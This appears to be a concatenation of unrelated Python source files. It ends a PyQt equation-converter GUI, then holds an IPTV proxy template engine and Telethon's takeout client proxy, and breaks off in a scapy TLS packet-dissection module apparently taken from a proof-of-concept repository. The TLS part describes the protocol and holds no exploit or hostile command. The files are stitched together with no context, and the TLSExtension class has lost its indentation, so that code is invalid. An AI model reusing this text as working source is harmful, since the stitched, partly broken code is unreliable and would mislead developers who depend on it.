        self.pasteBtn.clicked.connect(self.pasteBtn_Clicked)
        self.copyBtn.clicked.connect(self.copyBtn_Clicked)
        self.autoBtn.clicked.connect(self.autoBtn_Clicked)
        # Re-configure the converter whenever a symbol combo box changes.
        self.oldOrCombo.currentIndexChanged.connect(self.orCombo_Changed)
        self.newOrCombo.currentIndexChanged.connect(self.orCombo_Changed)
        self.oldAndCombo.currentIndexChanged.connect(self.andCombo_Changed)
        self.newAndCombo.currentIndexChanged.connect(self.andCombo_Changed)
        self.oldNotCombo.currentIndexChanged.connect(self.notCombo_Changed)
        self.newNotCombo.currentIndexChanged.connect(self.notCombo_Changed)
        self.oldNotOrderCombo.currentIndexChanged.connect(self.notCombo_Changed)
        self.newNotOrderCombo.currentIndexChanged.connect(self.notCombo_Changed)
        # DEBUGGING BUTTONS #
        self.testStringBtn.clicked.connect(self.testStringBtn_Clicked)

    ###############
    # CONVERT TAB #
    ###############
    def convertBtn_Clicked(self):
        # Convert the "old" equation and show the result in the "new" box.
        self.newEqTBox.setPlainText(eqConverter.convertEquation(self.oldEqTBox.toPlainText()))

    def pasteBtn_Clicked(self):
        self.oldEqTBox.setPlainText(pyperclip.paste())

    def copyBtn_Clicked(self):
        pyperclip.copy(self.newEqTBox.toPlainText())

    def autoBtn_Clicked(self):
        # Paste, convert and copy the result back to the clipboard in one step.
        self.oldEqTBox.setPlainText(pyperclip.paste())
        self.newEqTBox.setPlainText(eqConverter.convertEquation(self.oldEqTBox.toPlainText()))
        pyperclip.copy(self.newEqTBox.toPlainText())

    ##############
    # CONFIG TAB #
    ##############
    def orCombo_Changed(self):
        # First argument tells the converter whether a real swap is needed.
        if self.oldOrCombo.currentText() == self.newOrCombo.currentText():
            eqConverter.changeOr(False, self.oldOrCombo.currentText(), self.newOrCombo.currentText())
        else:
            eqConverter.changeOr(True, self.oldOrCombo.currentText(), self.newOrCombo.currentText())

    def andCombo_Changed(self):
        if self.oldAndCombo.currentText() == self.newAndCombo.currentText():
            eqConverter.changeAnd(False, True, self.oldAndCombo.currentText(), self.newAndCombo.currentText())
        else:
            eqConverter.changeAnd(True, True, self.oldAndCombo.currentText(), self.newAndCombo.currentText())

    def notCombo_Changed(self):
        # BUGFIX: oldOrder/newOrder are module-level settings. Without the
        # ``global`` declaration the assignments below created locals (and
        # could raise UnboundLocalError), and the calls at the bottom
        # misspelled ``oldOrder`` as ``oldOder``, raising NameError.
        global oldOrder, newOrder
        if self.oldNotOrderCombo.currentText() == "Before":
            oldOrder = "prefix"
        elif self.oldNotOrderCombo.currentText() == "After":
            oldOrder = "suffix"
        if self.newNotOrderCombo.currentText() == "Before":
            newOrder = "prefix"
        elif self.newNotOrderCombo.currentText() == "After":
            newOrder = "suffix"
        if self.oldNotCombo.currentText() == self.newNotCombo.currentText():
            eqConverter.changeNot(False, self.oldNotCombo.currentText(), oldOrder, self.newNotCombo.currentText(), newOrder)
        else:
            eqConverter.changeNot(True, self.oldNotCombo.currentText(), oldOrder, self.newNotCombo.currentText(), newOrder)

    ###########
    # TESTING #
    ###########
    def testStringBtn_Clicked(self):
        # Load the known-good test equation into the input box.
        self.oldEqTBox.setPlainText("(AVB') (AVCVD') (A+B+D')")
# Standard Qt application bootstrap: create the app, show the window, and
# enter the event loop (blocks until the window closes).
app = QtWidgets.QApplication(sys.argv)
myWindow = MyWindowClass(None)
myWindow.show()
app.exec_()
import logging
from abc import ABC
from abc import abstractmethod
from iptv_proxy.providers import ProvidersController
# Module-level logger, named after this module.
logger = logging.getLogger(__name__)
class ProviderHTMLTemplateEngine(ABC):
    """Abstract base for per-provider HTML/JS template rendering.

    Subclasses set ``_provider_name`` and implement the abstract render
    hooks; the toggle-password snippet is shared by all providers.
    """

    __slots__ = []

    _provider_name = None

    @classmethod
    @abstractmethod
    def render_configuration_template(cls, environment, configuration, active_providers_map_class):
        pass

    @classmethod
    @abstractmethod
    def render_iptv_proxy_script_configuration_clear_template(cls, environment):
        pass

    @classmethod
    @abstractmethod
    def render_iptv_proxy_script_configuration_declarations_template(cls, environment):
        pass

    @classmethod
    @abstractmethod
    def render_iptv_proxy_script_configuration_init_template(cls, environment):
        pass

    @classmethod
    @abstractmethod
    def render_iptv_proxy_script_configuration_reset_template(cls, environment):
        pass

    @classmethod
    def render_iptv_proxy_script_configuration_toggle_password_template(cls, environment):
        """Render the toggle-password JS snippet for this provider."""
        provider_map_class = ProvidersController.get_provider_map_class(cls._provider_name)
        provider_name = provider_map_class.constants_class().PROVIDER_NAME
        template = environment.get_template(
            'iptv_proxy_script_configuration_provider_toggle_password.js'
        )
        # The JS template only needs the camelCase provider name.
        fields = {
            'provider_name_camel_case': '{0}{1}'.format(provider_name[0].lower(), provider_name[1:])
        }
        return template.render(fields).lstrip()

    @classmethod
    @abstractmethod
    def render_iptv_proxy_script_configuration_update_template(cls, environment):
        pass
class XtreamCodesProviderHTMLTemplateEngine(ProviderHTMLTemplateEngine):
    """Template engine for Xtream-Codes style providers.

    Refactored: the heavily duplicated "look up the provider map class,
    build the camelCase name, render a JS template, split into lines"
    sequence is routed through small private helpers. Rendered output is
    unchanged.
    """

    __slots__ = []

    @classmethod
    def _provider_name_camel_case(cls):
        # e.g. "VaderStreams" -> "vaderStreams".
        provider_name = ProvidersController.get_provider_map_class(
            cls._provider_name
        ).constants_class().PROVIDER_NAME
        return '{0}{1}'.format(provider_name[0].lower(), provider_name[1:])

    @classmethod
    def _configuration_key(cls, suffix):
        # Configuration keys follow the "<PROVIDER>_<SUFFIX>" convention.
        return '{0}_{1}'.format(cls._provider_name.upper(), suffix)

    @classmethod
    def _render_script_template(cls, environment, template_name, include_snake_case=False):
        # Common body for the iptv_proxy_script_configuration_* templates:
        # render with the camelCase (and optionally snake_case) provider
        # name and return the result split into lines.
        fields = {'provider_name_camel_case': cls._provider_name_camel_case()}
        if include_snake_case:
            fields['provider_name_snake_case'] = cls._provider_name.lower()
        return environment.get_template(template_name).render(fields).split('\n')

    @classmethod
    def render_configuration_template(cls, environment, configuration, active_providers_map_class):
        """Render the provider's HTML configuration panel.

        Returns ``{PROVIDER_NAME: rendered_html}``. Options missing from
        ``configuration`` fall back to empty strings.
        """
        provider_map_class = ProvidersController.get_provider_map_class(cls._provider_name)
        template = environment.get_template('configuration_xstream_provider.html')
        fields = dict(
            provider_name_camel_case=cls._provider_name_camel_case(),
            provider_name_pascal_case=provider_map_class.constants_class().PROVIDER_NAME,
            configuration_provider_url='',
            configuration_provider_username='',
            configuration_provider_password='',
            configuration_provider_playlist_protocol_hls_selected='',
            configuration_provider_playlist_protocol_mpegts_selected='',
            configuration_provider_playlist_type_static_selected='',
            configuration_provider_playlist_type_dynamic_selected='',
            configuration_provider_epg_source_provider_selected='',
            configuration_provider_epg_source_other_selected='',
            configuration_provider_epg_url='',
        )
        fields['configuration_provider_active'] = (
            'checked="checked"'
            if cls._provider_name in active_providers_map_class
            else ''
        )

        # Plain text fields are copied through verbatim when configured.
        for suffix, field_name in (
            ('URL', 'configuration_provider_url'),
            ('USERNAME', 'configuration_provider_username'),
            ('PASSWORD', 'configuration_provider_password'),
        ):
            key = cls._configuration_key(suffix)
            if key in configuration:
                fields[field_name] = configuration[key]

        # Drop-downs: mark the configured option as selected. For EPG_SOURCE
        # the 'other' entry is listed last so it wins on a (pathological)
        # provider actually named 'other', matching the original priority.
        for suffix, option_to_field in (
            ('PLAYLIST_PROTOCOL', {
                'hls': 'configuration_provider_playlist_protocol_hls_selected',
                'mpegts': 'configuration_provider_playlist_protocol_mpegts_selected',
            }),
            ('PLAYLIST_TYPE', {
                'dynamic': 'configuration_provider_playlist_type_dynamic_selected',
                'static': 'configuration_provider_playlist_type_static_selected',
            }),
            ('EPG_SOURCE', {
                cls._provider_name: 'configuration_provider_epg_source_provider_selected',
                'other': 'configuration_provider_epg_source_other_selected',
            }),
        ):
            key = cls._configuration_key(suffix)
            if key in configuration:
                option = configuration[key].lower()
                if option in option_to_field:
                    fields[option_to_field[option]] = 'selected="selected" '

        # The EPG URL key may be present but explicitly None; keep '' then.
        epg_url_key = cls._configuration_key('EPG_URL')
        if epg_url_key in configuration and configuration[epg_url_key] is not None:
            fields['configuration_provider_epg_url'] = configuration[epg_url_key]

        return {
            provider_map_class.constants_class().PROVIDER_NAME: template.render(fields)
        }

    @classmethod
    def render_iptv_proxy_script_configuration_clear_template(cls, environment):
        """Render the JS snippet that clears this provider's settings."""
        return cls._render_script_template(
            environment, 'iptv_proxy_script_configuration_xstream_provider_clear.js'
        )

    @classmethod
    def render_iptv_proxy_script_configuration_declarations_template(cls, environment):
        """Render the JS variable declarations for this provider."""
        return cls._render_script_template(
            environment, 'iptv_proxy_script_configuration_xstream_provider_declarations.js'
        )

    @classmethod
    def render_iptv_proxy_script_configuration_init_template(cls, environment):
        """Render the JS init snippet for this provider."""
        return cls._render_script_template(
            environment, 'iptv_proxy_script_configuration_xstream_provider_init.js'
        )

    @classmethod
    def render_iptv_proxy_script_configuration_reset_template(cls, environment):
        """Render the JS reset snippet (also uses the snake_case name)."""
        return cls._render_script_template(
            environment,
            'iptv_proxy_script_configuration_xstream_provider_reset.js',
            include_snake_case=True,
        )

    @classmethod
    def render_iptv_proxy_script_configuration_update_template(cls, environment):
        """Render the JS update snippet (also uses the snake_case name)."""
        return cls._render_script_template(
            environment,
            'iptv_proxy_script_configuration_xstream_provider_update.js',
            include_snake_case=True,
        )
|
import functools
import inspect
from .users import UserMethods, _NOT_A_REQUEST
from .. import utils
from ..tl import functions, TLRequest
class _TakeoutClient:
    """
    Proxy object over the client. `c` is the client, `k` is its class,
    `r` is the takeout request, and `t` is the takeout ID.
    """
    def __init__(self, client, request):
        # We're a proxy object with __getattribute__ overridden so we
        # need to set attributes through the super class `object`.
        super().__setattr__('c', client)
        super().__setattr__('k', client.__class__)
        super().__setattr__('r', request)
        super().__setattr__('t', None)

    def __enter__(self):
        # We also get self attributes through super()
        if super().__getattribute__('c').loop.is_running():
            raise RuntimeError(
                'You must use "async with" if the event loop '
                'is running (i.e. you are inside an "async def")'
            )

        return super().__getattribute__(
            'c').loop.run_until_complete(self.__aenter__())

    async def __aenter__(self):
        # Enter/Exit behaviour is "overrode", we don't want to call start.
        # Sending the stored takeout request returns the session, whose id
        # every later call must be wrapped with.
        cl = super().__getattribute__('c')
        super().__setattr__('t', (await cl(super().__getattribute__('r'))).id)
        return self

    def __exit__(self, *args):
        return super().__getattribute__(
            'c').loop.run_until_complete(self.__aexit__(*args))

    async def __aexit__(self, *args):
        # Clearing the id makes further calls through this proxy fail fast.
        super().__setattr__('t', None)

    async def __call__(self, request, ordered=False):
        # Wrap one request (or each of a list of requests) in
        # InvokeWithTakeoutRequest before forwarding to the real client.
        takeout_id = super().__getattribute__('t')
        if takeout_id is None:
            raise ValueError('Cannot call takeout methods outside of "with"')

        single = not utils.is_list_like(request)
        requests = ((request,) if single else request)
        wrapped = []
        for r in requests:
            if not isinstance(r, TLRequest):
                raise _NOT_A_REQUEST
            await r.resolve(self, utils)
            wrapped.append(functions.InvokeWithTakeoutRequest(takeout_id, r))

        return await super().__getattribute__('c')(
            wrapped[0] if single else wrapped, ordered=ordered)

    def __getattribute__(self, name):
        if name[:2] == '__':
            # We want to override special method names
            return super().__getattribute__(name)

        # Everything else is looked up on the wrapped client.
        value = getattr(super().__getattribute__('c'), name)
        if inspect.ismethod(value):
            # Emulate bound methods behaviour by partially applying
            # our proxy class as the self parameter instead of the client,
            # so client methods issue their requests through this proxy.
            return functools.partial(
                getattr(super().__getattribute__('k'), name), self)
        else:
            return value

    def __setattr__(self, name, value):
        # Attribute writes go straight through to the wrapped client.
        setattr(super().__getattribute__('c'), name, value)
class AccountMethods(UserMethods):
    def takeout(
            self, contacts=None, users=None, chats=None, megagroups=None,
            channels=None, files=None, max_file_size=None):
        """
        Returns a proxy over the current :ref:`TelegramClient` that wraps
        every request in :tl:`InvokeWithTakeoutRequest`, i.e. performs it
        as part of a takeout (data export) session:

        >>> from telethon.sync import TelegramClient
        >>>
        >>> with TelegramClient(...) as client:
        >>>     with client.takeout() as takeout:
        >>>         client.get_messages('me')  # normal call
        >>>         takeout.get_messages('me')  # wrapped through takeout

        Some calls made through the takeout session have lower flood
        limits, which is useful for exporting conversations or
        mass-downloading media; only some requests are affected, and you
        will need to adjust the `wait_time` of methods like
        `client.iter_messages
        <telethon.client.messages.MessageMethods.iter_messages>`.

        All parameters default to ``False``; enable the ones you plan to
        use by setting them to ``True``. You should
        ``except errors.TakeoutInitDelayError as e``, which may raise
        depending on the session's condition; ``e.seconds`` tells you how
        long to wait before calling the method again.

        Args:
            contacts (`bool`):
                Set to ``True`` if you plan on downloading contacts.

            users (`bool`):
                Set to ``True`` if you plan on downloading information
                from users and their private conversations with you.

            chats (`bool`):
                Set to ``True`` if you plan on downloading information
                from small group chats, such as messages and media.

            megagroups (`bool`):
                Set to ``True`` if you plan on downloading information
                from megagroups (channels), such as messages and media.

            channels (`bool`):
                Set to ``True`` if you plan on downloading information
                from broadcast channels, such as messages and media.

            files (`bool`):
                Set to ``True`` if you plan on downloading media and
                you don't only wish to export messages.

            max_file_size (`int`):
                The maximum file size, in bytes, that you plan
                to download for each message with media.
        """
        init_request = functions.account.InitTakeoutSessionRequest(
            contacts=contacts,
            message_users=users,
            message_chats=chats,
            message_megagroups=megagroups,
            message_channels=channels,
            files=files,
            file_max_size=max_file_size
        )
        return _TakeoutClient(self, init_request)
|
# Source repository: csadsl/poc_exp
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <EMAIL> <github.com/tintinweb>
# http://www.secdev.org/projects/scapy/doc/build_dissect.html
from scapy.packet import Packet, bind_layers
from scapy.fields import *
from scapy.layers.inet import TCP, UDP
import os, time
class BLenField(LenField):
    """LenField variant supporting arbitrary on-wire byte widths
    (``numbytes``) and caller-supplied adjustment hooks for both directions
    (``adjust_i2m``: internal->machine, ``adjust_m2i``: machine->internal).
    """
    def __init__(self, name, default, fmt="I", adjust_i2m=lambda pkt, x:x, numbytes=None, length_of=None, count_of=None, adjust_m2i=lambda pkt, x:x):
        self.name = name
        self.adjust_i2m = adjust_i2m
        self.adjust_m2i = adjust_m2i
        self.numbytes = numbytes
        self.length_of = length_of
        self.count_of = count_of
        LenField.__init__(self, name, default, fmt)

        # Force network byte order unless the caller chose one explicitly.
        if fmt[0] in "@=<>!":
            self.fmt = fmt
        else:
            self.fmt = "!" + fmt
        self.default = self.any2i(None, default)
        # On-wire size: an explicit numbytes wins over struct's size.
        self.sz = struct.calcsize(self.fmt) if not numbytes else numbytes
        self.owners = []

    def addfield(self, pkt, s, val):
        """Add an internal value to a string"""
        pack = struct.pack(self.fmt, self.i2m(pkt, val))
        if self.numbytes:
            # Keep only the trailing numbytes of the packed value.
            pack = pack[len(pack) - self.numbytes:]
        return s + pack

    def getfield(self, pkt, s):
        """Extract an internal value from a string"""
        upack_data = s[:self.sz]
        # prepend struct.calcsize()-len(data) bytes to satisfy struct.unpack
        upack_data = '\x00' * (struct.calcsize(self.fmt) - self.sz) + upack_data

        return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, upack_data)[0])

    def i2m(self, pkt, x):
        # When no explicit value is set, derive the length/count from the
        # payload or the referenced field, then apply adjust_i2m.
        if x is None:
            if not (self.length_of or self.count_of):
                x = len(pkt.payload)
                x = self.adjust_i2m(pkt, x)
                return x

            if self.length_of is not None:
                fld, fval = pkt.getfield_and_val(self.length_of)
                f = fld.i2len(pkt, fval)
            else:
                fld, fval = pkt.getfield_and_val(self.count_of)
                f = fld.i2count(pkt, fval)
            x = self.adjust_i2m(pkt, f)
        return x

    def m2i(self, pkt, x):
        return self.adjust_m2i(pkt, x)
class XBLenField(BLenField):
    # BLenField that renders its value in hexadecimal.
    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))
class XLenField(LenField):
    # LenField that renders its value in hexadecimal.
    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))
class XFieldLenField(FieldLenField):
    # FieldLenField that renders its value in hexadecimal.
    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))
class BEnumField(EnumField):
    """EnumField variant supporting arbitrary on-wire byte widths via
    ``numbytes`` (same packing trick as BLenField)."""
    def __init__(self, name, default, enum, fmt="!I", numbytes=None):
        EnumField.__init__(self, name, default, enum, fmt)
        self.numbytes = numbytes

        self.name = name
        # Force network byte order unless the caller chose one explicitly.
        if fmt[0] in "@=<>!":
            self.fmt = fmt
        else:
            self.fmt = "!" + fmt
        self.default = self.any2i(None, default)
        # On-wire size: an explicit numbytes wins over struct's size.
        self.sz = struct.calcsize(self.fmt) if not numbytes else numbytes
        self.owners = []

    def addfield(self, pkt, s, val):
        """Add an internal value to a string"""
        pack = struct.pack(self.fmt, self.i2m(pkt, val))
        if self.numbytes:
            # Keep only the trailing numbytes of the packed value.
            pack = pack[len(pack) - self.numbytes:]
        return s + pack

    def getfield(self, pkt, s):
        """Extract an internal value from a string"""
        upack_data = s[:self.sz]
        # prepend struct.calcsize()-len(data) bytes to satisfy struct.unpack
        upack_data = '\x00' * (struct.calcsize(self.fmt) - self.sz) + upack_data

        return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, upack_data)[0])

    def i2repr_one(self, pkt, x):
        # Show the symbolic enum name when known, otherwise hex.
        if self not in conf.noenum and not isinstance(x, VolatileValue) and x in self.i2s:
            return self.i2s[x]
        return lhex(x)
class XBEnumField(BEnumField):
    # BEnumField that renders its value in hexadecimal.
    def i2repr(self, pkt, x):
        return lhex(self.i2h(pkt, x))
# TLS/SSL/DTLS protocol version numbers (record-layer "version" field).
TLS_VERSIONS = {0x0002: "SSL_2_0",
                0x0300: "SSL_3_0",
                0x0301: "TLS_1_0",
                0x0302: "TLS_1_1",
                0x0303: "TLS_1_2",
                0x0100: "PROTOCOL_DTLS_1_0_OPENSSL_PRE_0_9_8f",
                0xfeff: "DTLS_1_0",
                0xfefd: "DTLS_1_1",
                }

# TLS record-layer content types (RFC 5246; heartbeat per RFC 6520).
TLS_CONTENT_TYPES = {0x14: "change_cipher_spec",
                     0x15: "alert",
                     0x16: "handshake",
                     0x17: "application_data",
                     0x18: "heartbeat",
                     0xff: "unknown"}

# TLS handshake message types (RFC 5246 section 7.4; RFC 6066).
# BUGFIX: finished/certificate_url/certificate_status had their decimal ids
# (20/21/22) written as hex 0x20/0x21/0x22 and so never matched; correct
# values are 0x14/0x15/0x16. Also fixed the "certificate_stats" typo.
TLS_HANDSHAKE_TYPES = {0x00: "hello_request",
                       0x01: "client_hello",
                       0x02: "server_hello",
                       0x0b: "certificate",
                       0x0c: "server_key_exchange",
                       0x0d: "certificate_request",
                       0x0e: "server_hello_done",
                       0x0f: "certificate_verify",
                       0x10: "client_key_exchange",
                       0x14: "finished",
                       0x15: "certificate_url",
                       0x16: "certificate_status",
                       0xff: "unknown"}

# TLS extension types (RFC 6066 and friends).
# BUGFIX: "renegotiationg_info" typo -> "renegotiation_info" (RFC 5746).
TLS_EXTENSION_TYPES = {
    0x0000: "server_name",
    0x0001: "max_fragment_length",
    0x0002: "client_certificate_url",
    0x0003: "trusted_ca_keys",
    0x0004: "truncated_hmac",
    0x0005: "status_request",
    0x000a: "elliptic_curves",
    0x000b: "ec_point_formats",
    0x000d: "signature_algorithms",
    0x000f: "heartbeat",
    0x0023: "session_ticket_tls",
    0x3374: "next_protocol_negotiation",
    0xff01: "renegotiation_info",
}

# TLS alert levels (RFC 5246 section 7.2).
TLS_ALERT_LEVELS = {0x01: "warning",
                    0x02: "fatal",
                    0xff: "unknown", }

# TLS alert description codes (RFC 5246 section 7.2; decimal keys).
# BUGFIX: key 43 was listed twice (silently dropping BAD_CERTIFICATE) —
# bad_certificate is 42, unsupported_certificate is 43. Also fixed the
# UNEXPECTE_MESSAGE / DESCRIPTION_FAILED / RESPNSE spelling bugs.
TLS_ALERT_DESCRIPTIONS = {
    0: "CLOSE_NOTIFY",
    10: "UNEXPECTED_MESSAGE",
    20: "BAD_RECORD_MAC",
    21: "DECRYPTION_FAILED_RESERVED",
    22: "RECORD_OVERFLOW",
    30: "DECOMPRESSION_FAILURE",
    40: "HANDSHAKE_FAILURE",
    41: "NO_CERTIFICATE_RESERVED",
    42: "BAD_CERTIFICATE",
    43: "UNSUPPORTED_CERTIFICATE",
    44: "CERTIFICATE_REVOKED",
    45: "CERTIFICATE_EXPIRED",
    46: "CERTIFICATE_UNKNOWN",
    47: "ILLEGAL_PARAMETER",
    48: "UNKNOWN_CA",
    49: "ACCESS_DENIED",
    50: "DECODE_ERROR",
    51: "DECRYPT_ERROR",
    60: "EXPORT_RESTRICTION_RESERVED",
    70: "PROTOCOL_VERSION",
    71: "INSUFFICIENT_SECURITY",
    86: "INAPPROPRIATE_FALLBACK",
    80: "INTERNAL_ERROR",
    90: "USER_CANCELED",
    100: "NO_RENEGOTIATION",
    110: "UNSUPPORTED_EXTENSION",
    111: "CERTIFICATE_UNOBTAINABLE",
    112: "UNRECOGNIZED_NAME",
    113: "BAD_CERTIFICATE_STATUS_RESPONSE",
    114: "BAD_CERTIFICATE_HASH_VALUE",
    255: "UNKNOWN_255", }

# max_fragment_length extension codes (RFC 6066): code -> fragment size in
# bytes. NOTE: 0xff deliberately maps to the string 'unknown'.
TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM = {
    0x01: 2 ** 9,
    0x02: 2 ** 10,
    0x03: 2 ** 11,
    0x04: 2 ** 12,
    0xff: 'unknown',
}
class TLSCipherSuite:
    '''
    make ciphersuites available as class props (autocompletion)

    BUGFIX: RSA_WITH_3DES_EDE_CBC_SHA was defined twice with the same
    value; the duplicate made the reverse map below depend on dict
    iteration order. One definition removed.
    '''
    NULL_WITH_NULL_NULL = 0x0000
    RSA_WITH_NULL_MD5 = 0x0001
    RSA_WITH_NULL_SHA1 = 0x0002
    RSA_WITH_NULL_SHA256 = 0x003b
    RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
    DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
    DHE_DSS_WITH_3DES_EDE_CBC_SHA = 0x0013
    DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
    DHE_DSS_WITH_AES_128_CBC_SHA = 0x0032
    RSA_WITH_AES_128_CBC_SHA = 0x002f
    RSA_WITH_IDEA_CBC_SHA = 0x0007
    DHE_DSS_WITH_RC4_128_SHA = 0x0066
    RSA_WITH_RC4_128_SHA = 0x0005
    RSA_WITH_RC4_128_MD5 = 0x0004
    DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA = 0x0063
    RSA_EXPORT1024_WITH_DES_CBC_SHA = 0x0062
    RSA_EXPORT1024_WITH_RC2_CBC_56_MD5 = 0x0061
    DHE_RSA_WITH_DES_CBC_SHA = 0x0015
    DHE_DSS_WITH_DES_CBC_SHA = 0x0012
    RSA_WITH_DES_CBC_SHA = 0x0009
    DHE_DSS_EXPORT1024_WITH_RC4_56_SHA = 0x0065
    RSA_EXPORT1024_WITH_RC4_56_SHA = 0x0064
    RSA_EXPORT1024_WITH_RC4_56_MD5 = 0x0060
    DHE_RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0014
    DHE_DSS_EXPORT_WITH_DES40_CBC_SHA = 0x0011
    RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0008
    RSA_EXPORT_WITH_RC2_CBC_40_MD5 = 0x0006
    RSA_EXPORT_WITH_RC4_40_MD5 = 0x0003
    RSA_WITH_AES_256_CBC_SHA = 0x0035
    DHE_DSS_WITH_AES_256_CBC_SHA = 0x0038
    DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
    ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
    ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
    ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
    SRP_SHA_RSA_WITH_AES_256_CBC_SHA = 0xc021
    SRP_SHA_DSS_WITH_AES_256_CBC_SHA = 0xc022
    DHE_DSS_WITH_CAMELLIA_256_CBC_SHA = 0x0087
    DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
    ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
    RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
    TLS_FALLBACK_SCSV = 0x5600

# Reverse lookup: cipher-suite id -> symbolic name.
TLS_CIPHER_SUITES = dict((v, k) for k, v in TLSCipherSuite.__dict__.items() if not k.startswith("__"))
class TLSCompressionMethod:
    '''
    make compression methods available as class props (autocompletion)
    '''
    NULL = 0x00
    DEFLATE = 0x01

# Reverse lookup: numeric compression-method id -> symbolic name.
TLS_COMPRESSION_METHODS = {value: name
                           for name, value in TLSCompressionMethod.__dict__.items()
                           if not name.startswith("__")}
class TLSRecord(Packet):
    # TLS record-layer header: content type, protocol version, fragment length.
    name = "TLS Record"
    fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
                   XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   XLenField("length", None, fmt="!H"), ]
class TLSCiphertext(Packet):
    # Record header for an (encrypted) fragment; same layout as TLSRecord.
    name = "TLS Ciphertext Fragment"
    fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
                   XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   XLenField("length", None, fmt="!H"), ]
class TLSCiphertextDecrypted(Packet):
    # Opaque decrypted payload bytes of a ciphertext fragment.
    name = "TLS Ciphertext Decrypted"
    fields_desc = [ StrField("data", None, fmt="H")]
class TLSCiphertextMAC(Packet):
    # Opaque MAC bytes trailing a decrypted ciphertext fragment.
    name = "TLS Ciphertext MAC"
    fields_desc = [ StrField("mac", None, fmt="H")]
class TLSCompressed(Packet):
    # Record header for a compressed fragment; same layout as TLSRecord.
    name = "TLS Compressed Fragment"
    fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
                   XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   XLenField("length", None, fmt="!H"), ]
class TLSPlaintext(Packet):
    # Record header for a plaintext fragment; same layout as TLSRecord.
    name = "TLS Plaintext"
    fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
                   XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   XLenField("length", None, fmt="!H"), ]
class TLSHandshake(Packet):
    # Handshake message header: 1-byte type plus a 3-byte length
    # (hence XBLenField with numbytes=3).
    name = "TLS Handshake"
    fields_desc = [ByteEnumField("type", 0xff, TLS_HANDSHAKE_TYPES),
                   XBLenField("length", None, fmt="!I", numbytes=3), ]
class TLSServerName(Packet):
    # One SNI entry: name type (0 = host_name), length, and the name bytes.
    name = "TLS Servername"
    fields_desc = [ByteEnumField("type", 0x00, {0x00:"host"}),
                   XFieldLenField("length", None, length_of="data", fmt="H"),
                   StrLenField("data", "", length_from=lambda x:x.length),
                   ]
class TLSServerNameIndication(Packet):
    # server_name extension body (RFC 6066): length-prefixed SNI entry list.
    name = "TLS Extension Servername Indication"
    fields_desc = [XFieldLenField("length", None, length_of="server_names", fmt="H"),
                   PacketListField("server_names", None, TLSServerName, length_from=lambda x:x.length),
                   ]
class TLSExtension(Packet):
name = "TLS Extension"
fields_desc = [XShortEnumField("type", 0x0000, TLS_EXTENSION_TYPES),
XLenField("length", None, fmt="!H"),
]
def extract_padding(self, s):
return s[:self.length],s[self.length:]
# https://www.ietf.org/rfc/rfc3546.txt
class TLSExtMaxFragmentLength(Packet):
    """Max Fragment Length extension body (RFC 3546): a single enum byte."""
    name = "TLS Extension Max Fragment Length"
    fields_desc = [ByteEnumField("max_fragment_length", 0xff, TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM)]
    def extract_padding(self, s):
        # Extension body is exactly one byte; everything after it is padding.
        return '', s
CERT_CHAIN_TYPE = { 0x00: 'individual_certs',
                    0x01: 'pkipath',
                    0xff: 'unknown'}
TLS_TYPE_BOOLEAN = {0x00: 'false',
                    0x01: 'true'}
class TLSURLAndOptionalHash(Packet):
    """URLAndOptionalHash entry for the client_certificate_url extension:
    length-prefixed URL plus an optional 20-byte SHA-1 hash."""
    name = "TLS Extension Certificate URL/Hash"
    fields_desc = [XFieldLenField("url_length", None, length_of="url", fmt="H"),
                   StrLenField("url", "", length_from=lambda x:x.url_length),
                   ByteEnumField("hash_present", 0x00, TLS_TYPE_BOOLEAN),
                   StrLenField("sha1hash", "", length_from=lambda x:20 if x.hash_present else 0), # opaque SHA1Hash[20];
                   ]
class TLSExtCertificateURL(Packet):
    """client_certificate_url extension body: chain type + URL/hash list."""
    name = "TLS Extension Certificate URL"
    fields_desc = [ByteEnumField("type", 0xff, CERT_CHAIN_TYPE),
                   XFieldLenField("length", None, length_of="certificate_urls", fmt="H"),
                   PacketListField("certificate_urls", None, TLSURLAndOptionalHash, length_from=lambda x:x.length)
                   ]
    def extract_padding(self, s):
        return '', s
TLS_EXT_EC_POINT_FORMATS = {0x00:'uncompressed',
                            0x01:'ansiX962_compressed_prime',
                            0x02:'ansiX962_compressed_char2'}
class TLSExtECPointsFormat(Packet):
    """ec_point_formats extension body: 1-byte-length-prefixed format list."""
    name = "TLS Extension EC Points Format"
    fields_desc = [
                   XFieldLenField("length", None, length_of="ec_point_formats", fmt="B"),
                   FieldListField("ec_point_formats", None, ByteEnumField("ec_point_format", None, TLS_EXT_EC_POINT_FORMATS), length_from=lambda x:x.length),
                   ]
    def extract_padding(self, s):
        return '', s
TLS_EXT_ELLIPTIC_CURVES = {0x000e:'sect571r1',
                           }
class TLSExtEllipticCurves(Packet):
    """elliptic_curves extension body: 2-byte-length-prefixed curve id list."""
    name = "TLS Extension Elliptic Curves"
    fields_desc = [
                   XFieldLenField("length", None, length_of="elliptic_curves", fmt="H"),
